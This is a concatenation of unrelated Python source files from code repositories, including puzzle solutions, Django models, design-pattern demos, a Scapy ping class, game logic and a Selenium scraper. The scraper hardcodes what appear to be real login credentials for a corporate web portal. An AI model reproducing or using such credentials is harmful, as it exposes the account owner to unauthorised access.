    while True:
        state = tuple(banks)
        if state in history:
            if not redo:
                break
            history = set()
            redo -= 1
        history.add(state)
        # Pick the fullest bank (ties -> lowest index) and deal its blocks
        # one at a time around the ring.
        idx = banks.index(max(banks))
        blocks, banks[idx] = banks[idx], 0
        size = len(banks)
        for offset in range(1, blocks + 1):
            banks[(idx + offset) % size] += 1
    return len(history)
def test(log):
    """Self-test against the AoC example; True when both parts match."""
    sample = ["0 2 7 0"]
    return calc(log, sample, 0) == 5 and calc(log, sample, 1) == 4
def run(log, values):
    """Emit both puzzle answers through the supplied log callable."""
    for redo in (0, 1):
        log(calc(log, values, redo))
if __name__ == "__main__":
    import sys, os

    def find_input_file():
        # Try CLI-supplied names first, then the conventional input filenames,
        # in the current directory and the Puzzles/ locations.
        for fn in sys.argv[1:] + ["input.txt", f"day_{DAY_NUM:0d}_input.txt", f"day_{DAY_NUM:02d}_input.txt"]:
            for dn in [[], ["Puzzles"], ["..", "Puzzles"]]:
                cur = os.path.join(*(dn + [fn]))
                if os.path.isfile(cur): return cur

    fn = find_input_file()
    if fn is None: print("Unable to find input file!\nSpecify filename on command line"); exit(1)
    print(f"Using '{fn}' as input file:")
    # Strip line endings only (not spaces — the puzzle values may be tab/space separated).
    with open(fn) as f: values = [x.strip("\r\n") for x in f.readlines()]
    print(f"Running day {DAY_DESC}:")
    run(print, values)
|
[
"[email protected]"
] | |
7d694881d590f7fe45d3be9f6d9c0c180d407993
|
0049d7959ff872e2ddf6ea3ce83b6c26512425a6
|
/django_demo_applications/djangoprojectsot/modelinheritanceproject/testapp/models.py
|
2ba2ba663d87e53e60132476cad2e672ab93660a
|
[] |
no_license
|
srazor09/Django_projects
|
9806ab25d966af780cdabe652a1792220c7806a8
|
8d664ba4c9478bd93c8e5bcbcaf594e8ffe6ce93
|
refs/heads/master
| 2023-04-18T02:13:15.993393 | 2021-05-04T20:34:05 | 2021-05-04T20:34:05 | 364,379,605 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 695 |
py
|
from django.db import models
# Create your models here.
# class ContactInfo1(models.Model):
# name=models.CharField(max_length=64)
# email=models.EmailField()
# address=models.CharField(max_length=264)
#
# class Student1(ContactInfo1):
# rollno=models.IntegerField()
# marks=models.IntegerField()
#
# class Teacher1(ContactInfo1):
# subject=models.CharField(max_length=264)
# salary=models.FloatField()
class BasicModel(models.Model):
    # Parent model with three generic character fields; StandardModel below
    # extends it via Django multi-table inheritance (each gets its own table).
    f1=models.CharField(max_length=64)
    f2=models.CharField(max_length=64)
    f3=models.CharField(max_length=64)
class StandardModel(BasicModel):
    # Child model: inherits f1-f3 from BasicModel and adds two more fields.
    f4=models.CharField(max_length=64)
    f5=models.CharField(max_length=64)
|
[
"[email protected]"
] | |
2a8d31ce9ce3683a0d4c071feaf1b1488a845422
|
48dab42eeef7f971af1fe98045e669edb8e57ab0
|
/behavioural/observer_pattern.py
|
864f36310cf2de51d7e96f2ba31734a1eb35c03e
|
[
"MIT"
] |
permissive
|
cosmos-sajal/python_design_patterns
|
b7df3e83e74ac5eccd30e8037ebc70987407ca2b
|
d270989f1dfafaef48e4b585eca91603a6c0ac8e
|
refs/heads/master
| 2022-06-06T16:41:41.638518 | 2020-05-05T08:20:16 | 2020-05-05T08:20:16 | 260,250,022 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,112 |
py
|
# Docs - https://deductionlearning.com/design-patterns/observer-pattern-introductory-example/
# https://www.youtube.com/watch?v=wiQdrH2YpT4&list=PLF206E906175C7E07&index=4
# https://www.quora.com/What-are-some-real-world-uses-of-observer-pattern
# difference between PubSub and Observer Pattern -
# https://hackernoon.com/observer-vs-pub-sub-pattern-50d3b27f838c
from abc import ABCMeta, abstractmethod
class Subject(metaclass=ABCMeta):
    """Observable interface: concrete subjects maintain an observer list and
    broadcast state changes through notify().

    NOTE(review): concrete implementations take an observer argument for
    register/unRegister; these abstract signatures omit it — confirm intent.
    """

    @abstractmethod
    def register(self):
        pass

    @abstractmethod
    def unRegister(self):
        pass

    @abstractmethod
    def notify(self):
        pass
class Observer(metaclass=ABCMeta):
    """Interface for objects that receive stock-price change notifications."""

    @abstractmethod
    def update(self, googlePrice, applePrice, ibmPrice):
        # Fixed: the abstract signature was missing ``self``, making it
        # inconsistent with every concrete implementation (e.g. StockObserver)
        # and with how notify() invokes it as a bound method.
        pass
class StockObserver(Observer):
    """Concrete observer that registers itself with the subject on creation
    and prints every price broadcast it receives."""

    observerCounter = 0  # class-level counter used to hand out sequential ids

    def __init__(self, stockGrabber):
        StockObserver.observerCounter += 1
        self.observerId = StockObserver.observerCounter
        stockGrabber.register(self)

    def update(self, googlePrice, applePrice, ibmPrice):
        prices = [str(googlePrice), str(applePrice), str(ibmPrice)]
        print("observer id -" + str(self.observerId))
        print("the prices are:" + " ".join(prices))
class StockGrabber(Subject):
    """Concrete subject holding three stock prices; any setter change is
    immediately broadcast to all registered observers."""

    def __init__(self):
        self.googlePrice = 0.0
        self.applePrice = 0.0
        self.ibmPrice = 0.0
        self.observers = []

    def register(self, o):
        self.observers.append(o)

    def unRegister(self, o):
        self.observers.remove(o)

    def notify(self):
        # Push the full current state to every subscriber.
        for watcher in self.observers:
            watcher.update(self.googlePrice, self.applePrice, self.ibmPrice)

    def setGooglePrice(self, price):
        self.googlePrice = price
        self.notify()

    def setApplePrice(self, price):
        self.applePrice = price
        self.notify()

    def setIBMPrice(self, price):
        self.ibmPrice = price
        self.notify()
# Demo: two observers subscribe, then each price change triggers a broadcast
# (so each line below prints both observers' reports).
stockGrabber = StockGrabber()
observer1 = StockObserver(stockGrabber)
observer2 = StockObserver(stockGrabber)
stockGrabber.setGooglePrice(100.0)
stockGrabber.setApplePrice(200.0)
stockGrabber.setIBMPrice(300.0)
|
[
"[email protected]"
] | |
1e5122dc89c65f5bcead30da6a84115a1b6723ee
|
94f978c65b6368f936e18364cc477591094750f5
|
/quart/__init__.py
|
c7fa2b897ed9969c7681fd2a6aa8a28fd1fd4750
|
[
"MIT"
] |
permissive
|
tharvik/quart
|
2a4ff330dd384dc9f917b179e8d247808e7ccd6c
|
038680bcc1c0966481d73bdbe474f55a3ce104f4
|
refs/heads/master
| 2021-04-18T21:54:18.339532 | 2018-03-06T08:06:33 | 2018-03-06T08:11:48 | 126,790,492 | 0 | 0 | null | 2018-03-26T07:29:58 | 2018-03-26T07:29:58 | null |
UTF-8
|
Python
| false | false | 2,082 |
py
|
from jinja2 import escape, Markup
from .__about__ import __version__
from .app import Quart
from .blueprints import Blueprint
from .config import Config
from .ctx import (
after_this_request, copy_current_request_context, copy_current_websocket_context,
has_app_context, has_request_context, has_websocket_context,
)
from .exceptions import abort
from .globals import (
_app_ctx_stack, _request_ctx_stack, _websocket_ctx_stack, current_app, g, request, session,
websocket,
)
from .helpers import (
flash, get_flashed_messages, get_template_attribute, make_response, stream_with_context,
url_for,
)
from .json import jsonify
from .signals import (
appcontext_popped, appcontext_pushed, appcontext_tearing_down, before_render_template,
got_request_exception, message_flashed, request_finished, request_started,
request_tearing_down, signals_available, template_rendered,
)
from .static import safe_join, send_file, send_from_directory
from .templating import render_template, render_template_string
from .typing import ResponseReturnValue
from .utils import redirect
from .wrappers import Request, Response
__all__ = (
'__version__', '_app_ctx_stack', '_request_ctx_stack', '_websocket_ctx_stack', 'abort',
'after_this_request', 'appcontext_popped', 'appcontext_pushed', 'appcontext_tearing_down',
'before_render_template', 'Blueprint', 'Config', 'copy_current_request_context',
'copy_current_websocket_context', 'current_app', 'escape', 'flash', 'g',
'get_flashed_messages', 'get_template_attribute', 'got_request_exception', 'has_app_context',
'has_request_context', 'has_websocket_context', 'htmlsafe_dumps', 'jsonify', 'make_response',
'Markup', 'message_flashed', 'Quart', 'redirect', 'render_template', 'render_template_string',
'request', 'Request', 'request_finished', 'request_started', 'request_tearing_down',
'Response', 'ResponseReturnValue', 'safe_join', 'send_file', 'send_from_directory', 'session',
'signals_available', 'stream_with_context', 'template_rendered', 'url_for', 'websocket',
)
|
[
"[email protected]"
] | |
9c49f34c4e0af8d51ca97a03a373e5fc2d76440a
|
f0a5ad7b8aa39f51f233391fead0da3eabecc4ee
|
/.history/toolbox/middleware_20191129081531.py
|
bed0186b917d604de34c93cc7df6e8c7ddb4bfb8
|
[] |
no_license
|
OseiasBeu/webScrapping
|
e0a524847e55b24dbbd3d57bbe7fa43b4e101f48
|
1e72c7551aea355a891043baecfcbab8a89e719a
|
refs/heads/master
| 2022-10-25T18:12:50.858653 | 2020-06-18T01:29:24 | 2020-06-18T01:29:24 | 224,681,550 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,601 |
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from datetime import datetime
import toolbox.sheets as sheet
import pandas as pd
def middleware():
    """Scrape the Whirlpool middleware query-analyzer page for orders pending
    integration, merge with the local Excel history, and push to a sheet.

    Requires chromedriver.exe and base_middleware.xlsx in the working dir.
    """
    driver = webdriver.Chrome(executable_path='chromedriver.exe')
    driver.get("https://wsmid-prd.whirlpool.com.br/manager/reports/frmQueryAnalyzer.aspx?menu=2")
    # SECURITY: credentials are hardcoded in source — move to env/config.
    dominio = 'whirlpool'
    usuario = 'daniel_coelho'
    senha = 'Sua95xb4'
    bra = "BRA"
    data = '2019-11-01'
    # Counts non-integrated order items per state/warehouse since `data`.
    query = "SELECT pedido.clienteEstado, pedidoItem.warehouseId, count(pedidoItem.warehouseId) as [Pendentes de integraรงรฃo] FROM pedido LEFT JOIN pedidoItem ON pedido.codigoPedido = pedidoItem.codigoPedido WHERE pedido.datahoracriacao > '{}' AND pedido.clientepais = '{}' AND pedido.flagIntegrado = 0 GROUP BY pedidoItem.warehouseId, pedido.clienteEstado ORDER BY [Pendentes de integraรงรฃo] DESC".format(data,bra)
    # Log in through the form.
    campo_dominio = driver.find_element_by_id("ucLogin1_txtDominio")
    campo_dominio.send_keys(dominio)
    campo_usuario =driver.find_element_by_id("ucLogin1_txtUser")
    campo_usuario.send_keys(usuario)
    campo_senha = driver.find_element_by_id("ucLogin1_txtPass")
    campo_senha.send_keys(senha)
    campo_senha.send_keys(Keys.RETURN)
    # Select "no limit" on rows, paste the query and execute it.
    records = driver.find_element_by_id("ctl00_ContentPlaceHolder1_dropRows")
    records.send_keys('sem limites')
    text_query = driver.find_element_by_id("ctl00_ContentPlaceHolder1_txtQuery")
    text_query.send_keys(query)
    executar = driver.find_element_by_id("ctl00_ContentPlaceHolder1_imbExecutar").click()
    # Collect every table row as a list of whitespace-split tokens.
    arr = []
    resposta = driver.find_elements_by_tag_name('tr')
    for item in range(len(resposta)):
        linha = resposta[item].text
        arr.append(linha.split())
    # Row 3 holds the header; the multi-word column name was split into three
    # tokens, so re-join them into a single column label.
    coluna = arr[3]
    coluna1 = coluna.pop(3)
    coluna1 = coluna1 +" "+ coluna.pop(3)
    coluna1 = coluna1 +" "+ coluna.pop(3)
    coluna.append(coluna1)
    df = pd.DataFrame(data=arr[4:], columns=coluna)
    # df = df.insert(0,'timeStamp')
    now = datetime.now()
    df['timeStamp'] = ''
    df1 = df.drop(columns='#')
    wb = pd.ExcelFile('base_middleware.xlsx')
    base_m = pd.read_excel(wb)
    print(base_m.head())
    print(df1.head())
    sheet.insertPlanMiddleware(df1)
    # NOTE(review): '%m/%S/%Y %H:%M:%S' uses %S (seconds) in the date part —
    # %d (day) was probably intended; confirm before relying on this stamp.
    base_m['timeStamp'] = datetime.now().strftime('%m/%S/%Y %H:%M:%S')
    print(df1)
    # NOTE(review): DataFrame.append returns a new frame; this result is
    # discarded, so the history is never actually merged — confirm intent.
    df1.append(base_m)
    print(base_m)
    nomeArquivo = 'base_middleware.xlsx'
    df1.to_excel(nomeArquivo, index=False)
    sair = driver.find_element_by_id("ctl00_lgStatus").click()
    driver.close()
# clienteEstado warehouseId Pendentes de integraรงรฃo รltima hora?
|
[
"[email protected]"
] | |
43d3606680c7c08b541d8e66a106bbe7f13c0fa7
|
2923b9f58e6a143a3e070169612165585c301def
|
/LA/gp_rupture_test/LA/gp_rupture_test/gp_021219_Scott_7.35_noplas_2hz/fault_full_loc.py
|
d3f385c3d1a7f68a7593b81008a1ecdc93ae3228
|
[] |
no_license
|
hzfmer/summit_work_021421
|
16536dd716519bc9244da60007b9061ef5403429
|
6981b359fefb2af22e0bea6c47511de16cad22bd
|
refs/heads/master
| 2023-03-11T15:34:36.418971 | 2021-02-05T23:22:10 | 2021-02-05T23:22:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,451 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 17 2018
@author: Zhifeng Hu <[email protected]>
"""
import glob
import os
import sys
import time

import numpy as np
from numpy import sin, cos, pi, sqrt
from scipy.interpolate import interp1d
# Reference / desired timestep counts and fault strike rotation (degrees);
# only nx from the SRF header is actually used below.
nt_ref = 2000
nt_des = 10 * nt_ref
theta_rot = 35

# Read the fault-plane dimensions from the SRF header (line 3: "... nx nz").
f = open(glob.glob('./*.srf')[0], 'r')
f.readline()
f.readline()
token = f.readline()
nx = int(token.split()[2])
nz = int(token.split()[3])
f.close()

if not os.path.isfile('fault_full_loc.txt'):
    # Two endpoints of the fault trace in surface-grid indices.
    fault_loc = np.array(np.loadtxt("fault_loc.idx"))
    x1 = int(fault_loc[0, 0])
    x2 = int(fault_loc[1, 0])
    y1 = int(fault_loc[0, 1])
    y2 = int(fault_loc[1, 1])
    x_tmp = np.linspace(x1, x2, np.abs(x2 - x1) + 1)
    # Fixed: np.float / np.int were deprecated aliases of the builtins and
    # were removed in NumPy 1.24 — use float()/int() directly.
    y_tmp = [float((y2 - y1) / (x2 - x1)) * (x - x1) + y1 for x in x_tmp]
    f_interp = interp1d(x_tmp, y_tmp, fill_value='extrapolate')
    # Extend the trace to twice the fault length, keeping x ascending.
    if x1 < x2:
        new_x = np.arange(x1, x1 + nx * 2)
        new_y = [int(i) for i in f_interp(new_x)]
    else:
        new_x = np.arange(x1 + 1 - nx * 2, x1 + 1)
        new_y = [int(i) for i in f_interp(new_x)]
        new_x = new_x[::-1]
        new_y = new_y[::-1]
    # Surface grid of (lon, lat) pairs covering the full model domain.
    mx = 6320
    my = 4200
    ll = np.fromfile('../scripts/surf.grid', dtype='float64', count=2 * my * mx).reshape(my, mx, 2)
    ll_fault = [np.float32((ll[new_y[i], new_x[i], 0], ll[new_y[i], new_x[i], 1])) for i in range(len(new_x))]
    # Fixed: previously saved the full 3-D grid `ll`, which np.savetxt rejects
    # (it only accepts 1-D/2-D arrays); the extracted per-point fault
    # coordinates `ll_fault` match the output filename and were intended.
    np.savetxt('fault_full_loc.txt', ll_fault, fmt='%f')
    # np.array(ll_fault).tofile('latlon_fault.bin')
|
[
"[email protected]"
] | |
c553f3cf8e814068e3de80a5d5d74670c9a32497
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_212/62.py
|
2e921c86f22c4e6edb1a0681c1da5040d943a43a
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 793 |
py
|
import sys
import itertools
# NOTE: Python 2 source (print statement, xrange) — run with python2.
sys.setrecursionlimit(10000000)  # dp() recurses once per consumed group

# Google Code Jam: one test-case count line, then per case a "N P" line and
# a line of N group sizes.
tc = int(sys.stdin.readline().strip())
for tmp_tc in xrange(tc):
    [ N, P ] = map(lambda x: int(x), sys.stdin.readline().strip().split(' '))
    gs = map(lambda x: int(x), sys.stdin.readline().strip().split(' '))
    # cnts[r] = number of groups whose size is congruent to r (mod P); only
    # the residues matter for the answer.
    cnts = [ 0 ] * P
    for g in gs:
        cnts[g % P] += 1
    cache = {}
    def dp(cfg, p):
        # Minimum number of "unhappy" servings over all orders of the
        # remaining groups, memoised on (remaining residue counts, running
        # remainder p). cfg is mutated in place and restored around the
        # recursive call.
        if sum(cfg) == 0: return 0
        key = tuple(cfg), p
        if key in cache: return cache[key]
        res = None
        for idx, k in enumerate(cfg):
            if k == 0: continue
            cfg[idx] -= 1
            pp = (p + idx) % P
            tmp = dp(cfg, pp)
            if p: tmp += 1  # serving a group while p != 0 costs one
            if res is None or res > tmp: res = tmp
            cfg[idx] += 1
        cache[key] = res
        return res
    # Answer = happy groups = total groups minus the minimal unhappy count.
    res = len(gs) - dp(cnts, 0)
    print "Case #%d: %d" % (1+tmp_tc, res)
|
[
"[email protected]"
] | |
6d73d131e26cfb65c423acd5a641958d3283c4e9
|
8704a683e1fa8c7c15d114fca47345eef060326b
|
/็ฑป/Pingclass.py
|
37f162cbbd1550ec1a90053f63e4624826cfe8ab
|
[] |
no_license
|
jiaojiner/Python_Basic
|
823be07e8c02585174d933bc3e4ecf528086162c
|
788243f95746e2a00890ebb3262085598ab84800
|
refs/heads/master
| 2020-12-31T22:47:04.561208 | 2020-11-23T13:59:04 | 2020-11-23T13:59:04 | 239,061,150 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 814 |
py
|
#!/usr/bin/env python3
# -*- encoding = utf-8 -*-
# Written while learning Python; for personal practice and amusement only.
# Author QQ: 1945962391
# Comments and discussion welcome — let's learn and improve together!
from scapy.layers.inet import IP, ICMP
from scapy.sendrecv import sr1
class Pingclass:
    """Send ICMP echo requests from a chosen source IP and print whether the
    destination is reachable (output strings are in Chinese)."""

    def __init__(self, srcip, dstip, qua=1):
        # srcip: source IP to use/spoof; dstip: probe target; qua: probe count.
        self.srcip = srcip
        self.ip = dstip
        self.qua = qua
        # Pre-built IP/ICMP echo packet reused for every probe.
        self.pkt = IP(src=self.srcip, dst=self.ip)/ICMP()

    # def src(self, srcip):
    #     self.srcip = srcip
    #     self.pkt = IP(src=self.srcip, dst=self.ip)/ICMP()

    def ping(self):
        """Send `qua` probes, waiting up to 1 s for each reply, and print
        reachable / unreachable per probe."""
        for x in range(self.qua):
            result = sr1(self.pkt, timeout=1, verbose=False)
            if result:
                print(self.ip, 'ๅฏ่พพ๏ผ')
            else:
                print(self.ip, 'ไธๅฏ่พพ๏ผ')
|
[
"[email protected]"
] | |
815daa7a085d07da2383291fdfe140fe3de24d40
|
667f153e47aec4ea345ea87591bc4f5d305b10bf
|
/Solutions/Ch1Ex005.py
|
0a2cd702fe7a62a4875fa2674961e86c12ac5580
|
[] |
no_license
|
Parshwa-P3/ThePythonWorkbook-Solutions
|
feb498783d05d0b4e5cbc6cd5961dd1e611f5f52
|
5694cb52e9e9eac2ab14b1a3dcb462cff8501393
|
refs/heads/master
| 2022-11-15T20:18:53.427665 | 2020-06-28T21:50:48 | 2020-06-28T21:50:48 | 275,670,813 | 1 | 0 | null | 2020-06-28T21:50:49 | 2020-06-28T21:26:01 |
Python
|
UTF-8
|
Python
| false | false | 342 |
py
|
# Ch1Ex005.py
# Author: Parshwa Patil
# ThePythonWorkbook Solutions
# Exercise No. 5
# Title: Bottle Deposits
def main():
    """Read counts of small (<1 L) and large (>1 L) bottles and print the
    total deposit refund ($0.10 / $0.25 per bottle respectively)."""
    small = int(input("Less than 1 L: "))
    large = int(input("More than 1 L: "))
    total = (0.1 * small) + (0.25 * large)
    print("Refund: $" + str(total))


if __name__ == "__main__": main()
|
[
"[email protected]"
] | |
8a4708add6cdfe447fdcca3cdccadf54add34fad
|
220f1e6f1bd604b0ce452d2337669ad72ef7c11e
|
/quiz.py
|
a002fa0a884bdd8c7e27d8c73631451a5e2cfbde
|
[] |
no_license
|
bikashlama541/RoomA
|
9545fa75cf0f02ef4022b692de366423b27d906d
|
a7f9035ad67ad7cc7e32e2bbb488d65f4ec5c4a1
|
refs/heads/master
| 2020-07-23T01:29:44.354382 | 2019-09-09T21:45:52 | 2019-09-09T21:45:52 | 207,400,892 | 0 | 1 | null | 2019-09-09T21:45:53 | 2019-09-09T20:42:38 |
Python
|
UTF-8
|
Python
| false | false | 547 |
py
|
class Question:
    """One quiz item: the text shown to the player and the correct key."""

    def __init__(self, prompt, answer):
        self.prompt = prompt
        self.answer = answer
# Fixed: the list was defined as `questions_prompts` but referenced below as
# `question_prompts`, which raised NameError at import time.
question_prompts = [
    "What colors are apple?\n (a) Red/Green\n (b) Orange",
    "What colors are bananas?\n (a) Red/Green\n (b)Yellow",
]

# The quiz: each prompt paired with its correct answer key.
questions = [
    Question(question_prompts[0], "a"),
    Question(question_prompts[1], "b"),
]
def run_quiz(questions):
    """Ask each question on stdin and report how many answers were correct."""
    score = 0
    for question in questions:
        # Fixed: `inputer` was a typo for the builtin `input` (NameError).
        answer = input(question.prompt)
        if answer == question.answer:
            score += 1
    print("You got", score, "out of", len(questions))


run_quiz(questions)
|
[
"[email protected]"
] | |
4cce4300cd93c522062d17864b7d7b6579a90919
|
eaeb685d13ef6c58364c5497c911f3e2f8c49a43
|
/Solution/520_Detect_Capital.py
|
72853824378aa294f92113350b1c6fc2394d75c7
|
[] |
no_license
|
raririn/LeetCodePractice
|
8b3a18e34a2e3524ec9ae8163e4be242c2ab6d64
|
48cf4f7d63f2ba5802c41afc2a0f75cc71b58f03
|
refs/heads/master
| 2023-01-09T06:09:02.017324 | 2020-09-10T02:34:46 | 2020-09-10T02:34:46 | 123,109,055 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 448 |
py
|
class Solution:
    def detectCapitalUse(self, word: str) -> bool:
        """Return True when capitals are used correctly in *word*: all
        uppercase, all lowercase, or only the first letter capitalized."""
        if word.isupper() or word.islower():
            return True
        # Fixed: `wprd` was a typo for `word`, raising NameError on any
        # mixed-case input that reached this branch.
        elif word[1:].islower() and word[0].isupper():
            return True
        else:
            return False
'''
Runtime: 40 ms, faster than 42.73% of Python3 online submissions for Detect Capital.
Memory Usage: 13.8 MB, less than 6.67% of Python3 online submissions for Detect Capital.
'''
|
[
"[email protected]"
] | |
5f67ab5c03e5c44dd8eafab1df10221c656733c3
|
3a60b8935f809e300405214a66d949f0042e7e46
|
/src/game/logic/player_control/player_control.py
|
01107f77ef3e00a355c7b889bb6556490849130a
|
[] |
no_license
|
stellarlib/centaurus
|
e71fe5c98b94e8e575d00e32f55ba39fe71799e6
|
896ae73165f3f44dfb87378ef2635d447ccbccae
|
refs/heads/master
| 2020-08-29T00:02:47.294370 | 2020-07-06T20:06:02 | 2020-07-06T20:06:02 | 217,860,282 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,929 |
py
|
from .standard_control import StandardControl
from .jump_control import JumpControl
from .ranged_control import RangedControl
from .charge_control import ChargeControl
from .action_cost import *
class PlayerControl(object):
    """Routes player input to per-mode controller objects and enforces the
    action-point (AP) economy of the player's turn.

    Animation callbacks: every player action sets _animating, starts an
    animation on the player actor, and passes a resolve_func closure that the
    animation invokes on completion to spend AP and clear _animating.
    """

    # Action-mode identifiers.
    STD = 0
    RANGED = 1
    JUMP = 2
    CHARGE = 3

    # UI button id -> mode enum.
    str_to_enum = {
        'std': STD,
        'ranged': RANGED,
        'jump': JUMP,
        'charge': CHARGE,
    }

    # AP price of each mode's action (constants from action_cost module).
    action_cost = {
        STD: MOVE_COST,
        RANGED: RANGED_COST,
        JUMP: JUMP_COST,
        CHARGE: CHARGE_COST
    }

    def __init__(self, logic):
        self.game = logic.game
        self.logic = logic
        cls = PlayerControl
        self.mode = cls.STD
        # One controller object per mode; each calls back into this object.
        self.controls = {
            cls.STD: StandardControl(self),
            cls.RANGED: RangedControl(self),
            cls.JUMP: JumpControl(self),
            cls.CHARGE: ChargeControl(self)
        }
        self._player_turn = True
        self._animating = False

    @property
    def player(self):
        return self.logic.player

    @property
    def active(self):
        # Input is accepted only during the player's turn and never mid-animation.
        return self._player_turn and not self._animating

    @property
    def button_map(self):
        return self.game.buttons

    #####################
    #  Routing input    #
    #################

    def switch_mode(self, mode_name):
        # this models the panel of buttons where the player toggles between action types
        cls = PlayerControl
        mode = cls.str_to_enum[mode_name]
        if self.mode == mode:
            # Clicking the active mode toggles back to standard.
            self.mode = cls.STD
            #print('switched to standard mode')
            self.reset_mode_panel()
        else:
            cost = cls.action_cost[mode]
            if cost > self.player.actions:
                #print("can't switch to ", mode_name, " mode - insufficient player actions")
                button = self.button_map.get_button_by_id(mode_name)
                button.rumble()
            else:
                self.mode = mode
                self.controls[self.mode].init_mode()
                # print('switched to ', mode_name, ' mode')
                self.reset_mode_panel()
                if mode_name != 'std':
                    button = self.button_map.get_button_by_id(mode_name)
                    button.button_down()

    def reset_mode_panel(self):
        # Visually release every mode button before pressing the active one.
        [button.button_up() for button in self.button_map.get_button_group('action_mode')]

    def handle_click(self, pos):
        if self.active:
            self.controls[self.mode].handle_click(pos)

    def manual_switch_mode(self, mode_name):
        if self.active:
            self.switch_mode(mode_name)
        else:
            button = self.button_map.get_button_by_id(mode_name)
            button.rumble()

    def manual_turn_end(self):
        # NOTE(review): reconstructed nesting — the skip-button press is
        # assumed to happen only when the rest actually occurs; confirm.
        if self.active:
            self.rest()
            button = self.button_map.get_button_by_id('skip')
            button.button_down()

    def start_animating(self):
        self._animating = True

    def end_animating(self):
        self._animating = False

    ##########################################################
    # Player controls
    ####################

    def move_player(self, pos):
        def resolve_func():
            self.spend_action(MOVE_COST)
            self.end_animating()
        self.start_animating()
        self.player.start_move(pos, resolve_func)

    def player_exits_level(self, pos):
        def resolve_func():
            self.end_animating()
            self.player.travel_component.travel_to_next_level(pos)
            # get next level according to pos
            # get the new player pos on that level
            # start the new level, put player in new pos
            # refresh the turn so it is player start turn, full AP
        self.start_animating()
        self.player.start_exit_move(pos, resolve_func)

    def jump_player(self, pos):
        def resolve_func():
            self.spend_action(JUMP_COST)
            self.end_animating()
        self.start_animating()
        self.player.start_jump(pos, resolve_func)

    def player_jump_attacks(self, pos):
        foe = self.logic.get_actor_at(pos)
        def resolve_func():
            self.player.melee_attack(foe)
            self.spend_action(JUMP_COST)
            self.end_animating()
        self.start_animating()
        self.player.start_jump_attack(pos, resolve_func)

    def player_attacks(self, pos):
        foe = self.logic.get_actor_at(pos)
        assert foe != self.player
        def resolve_func():
            self.spend_action(MELEE_COST)
            self.end_animating()
        self.start_animating()
        self.player.start_melee_attack(foe, resolve_func)

    def player_ranged_attacks(self, pos):
        foe = self.logic.get_actor_at(pos)
        assert foe != self.player
        def resolve_func():
            self.spend_action(RANGED_COST)
            self.end_animating()
        # NOTE(review): unlike the other actions, no start_animating() call
        # here even though resolve_func ends animation — confirm intent.
        self.player.start_ranged_attack(pos, resolve_func)

    def charge_player(self, charge_path):
        def resolve_func():
            self.spend_action(CHARGE_COST)
            self.end_animating()
        self.start_animating()
        self.player.start_charge(charge_path, resolve_func)

    ###################################################
    #    Game Logic   #
    ##############

    def spend_action(self, x):
        # Always drop back to standard mode after an action resolves; the
        # turn ends automatically when AP reaches zero.
        self.switch_mode('std')
        assert x <= self.player.actions
        self.player.spend_actions(x)
        if self.player.actions == 0:
            self.end_turn()

    def start_player_turn(self):
        self._player_turn = True
        self.set_up_turn()

    def set_up_turn(self):
        # Grant the per-turn AP allowance.
        self.player.restore(2)

    def tear_down_turn(self):
        print('player turn over')
        self.logic.start_ai_turn()

    def end_turn(self):
        self.tear_down_turn()
        self._player_turn = False

    def rest(self):
        # Skipping the turn converts the remainder into 1 extra AP restored.
        self.player.restore(1)
        self.end_turn()
|
[
"[email protected]"
] | |
884cc588e8613418d6e38335716aadf8320bf7d1
|
f1ad2ff0061f67540ae0723a65c6e1238e9ca77f
|
/brainminer/base/api.py
|
9ab5865150d1a9442943b8b3293af060688cb8c7
|
[] |
no_license
|
rbrecheisen/brainminer
|
efb89b0d804196a7875fadd3491a9cb7e6cb0428
|
2f5d7bd53ba4761af1f67fa7bd16e2c6724feb7d
|
refs/heads/master
| 2021-01-20T19:08:42.447425 | 2017-06-22T08:28:57 | 2017-06-22T08:28:57 | 34,522,617 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,737 |
py
|
from flask import g, Response
from flask_restful import Resource, HTTPException, abort
from brainminer.auth.exceptions import (
MissingAuthorizationHeaderException, UserNotFoundException, UserNotActiveException, InvalidPasswordException,
SecretKeyNotFoundException, SecretKeyInvalidException, TokenDecodingFailedException, PermissionDeniedException,
UserNotSuperUserException, UserNotAdminException)
from brainminer.auth.authentication import check_login, check_token
from brainminer.auth.permissions import has_permission, check_permission, check_admin, check_superuser
# ----------------------------------------------------------------------------------------------------------------------
class BaseResource(Resource):
    """Common base for all API resources; exposes the request-scoped globals
    (config, DB session, authenticated user) stashed on flask.g."""

    # Commented-out generic error handler retained from earlier iterations:
    # def dispatch_request(self, *args, **kwargs):
    #
    #     code = 400
    #
    #     try:
    #         return super(BaseResource, self).dispatch_request(*args, **kwargs)
    #     except HTTPException as e:
    #         message = e.data['message']
    #         code = e.code
    #     except Exception as e:
    #         message = e.message
    #
    #     if message is not None:
    #         print('[ERROR] {}.dispatch_request() {}'.format(self.__class__.__name__, message))
    #         abort(code, message=message)

    @staticmethod
    def config():
        # Application configuration placed on g by a before-request hook.
        return g.config

    @staticmethod
    def db_session():
        # Request-scoped database session.
        return g.db_session

    @staticmethod
    def current_user():
        # User resolved by the authentication layer for this request.
        return g.current_user
# ----------------------------------------------------------------------------------------------------------------------
class HtmlResource(BaseResource):
    """Base class for endpoints that return rendered HTML instead of JSON."""

    @staticmethod
    def output_html(data, code, headers=None):
        response = Response(data, mimetype='text/html', headers=headers)
        response.status_code = code
        return response
# ----------------------------------------------------------------------------------------------------------------------
